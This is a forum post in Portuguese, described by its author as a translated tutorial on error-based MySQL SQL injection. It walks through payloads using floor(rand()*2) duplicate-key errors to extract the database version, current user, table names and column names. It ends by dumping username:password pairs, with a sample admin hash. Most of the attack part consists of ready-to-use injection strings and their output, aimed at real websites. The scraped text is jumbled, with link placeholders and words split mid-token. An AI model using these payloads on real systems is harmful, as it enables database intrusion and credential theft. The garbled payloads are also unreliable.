Tweet
ola pessoal esse tutorial não e de minha autoria eu apenas traduzi ele ele e pra quem ja tem um pouco de conhecimento em sql injection então vamos lá
eo resultado será parecido com este
então aqui '5 .0.92-community-log1 'é a versão sites.
agora temos que encontrar sites current_user tão nosso comando será: -
resultado
ok agora vamos encontrar tabelas por este comando: -
resultado deve ser
agora continuar a aumentar o limite que você pode encontrá-lo perto
aqui mudar o '0 limite, 1'to 1,1 então 2,1 até que você obter o erro.
ok agora vamos encontrar tabelas que contém os dados para o nosso comando será: -
resultado
então aqui novamente aumentar o valor limite até chegar a tabela como usuário, admin,, sessão, etc etc.
ok agora suponha que temos o nome da tabela "user" tão próximo passo é encontrar colunas desta tabela nosso comando será: -
resultado
você pode alterar o texto para hexadecimal aqui >> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
novamente ficar mudando os limites de valor até que você obter colunas como nome de usuário, senha etc :/
ok agora temos colunas nome de usuário e senha precisamos dos dados dentro das colunas para o nosso comando será: -
resultado
Bem pessoal espero que tenha dado para dar uma entendida abraços e so lembrando que eu apenas traduzir o texto que estava em ingles mesmo asim vou dar credito de quem eu peguei PAIN006
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... count(*),concat((select+concat(version())+from+inf ormation_schema.tables+limit+0,1),floor(Rand(0)*2 ))a+from+information_schema.tables+group+by+a)b)
"Duplicate entry '5.0.92-community-log1' for key 1"
agora temos que encontrar sites current_user tão nosso comando será: -
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... count(*),concat((select+concat(current_user())+fro m+information_schema.tables+limit+0,1),floor(Rand (0)*2))a+from+information_schema.tables+group+by+a )b)
"Duplicate entry user+1' for key 1"
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... count(*),concat((select+concat(table_name)+from+in formation_schema.tables+limit+0,1),floor(Rand(0)* 2))a+from+information_schema.tables+group+by+a)b)
"duplicate entry 'table_name1' for key 1'
((table_name)+from+information_schema.tables+limit +0,1) )
ok agora vamos encontrar tabelas que contém os dados para o nosso comando será: -
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... count(*),concat((select+concat(table_name)+from+in formation_schema.tables+where+table_schema=databa se()+limit+0,1),floor(Rand(0)*2))a+from+informatio n_schema.tables+group+by+a)b)
"duplicate entry tablename1' for key 1"
ok agora suponha que temos o nome da tabela "user" tão próximo passo é encontrar colunas desta tabela nosso comando será: -
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... count(*),concat((select+concat(column_name)+from+i nformation_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+informat ion_schema.tables+group+by+a)b)
"Duplicate entry 'column name1' for key 1'
novamente ficar mudando os limites de valor até que você obter colunas como nome de usuário, senha etc :/
ok agora temos colunas nome de usuário e senha precisamos dos dados dentro das colunas para o nosso comando será: -
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... count(*),concat((select+concat(username,0x3a,passw ord)+from+user+limit+0,1),floor(Rand(0)*2))a+from +information_schema.tables+group+by+a)b)
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"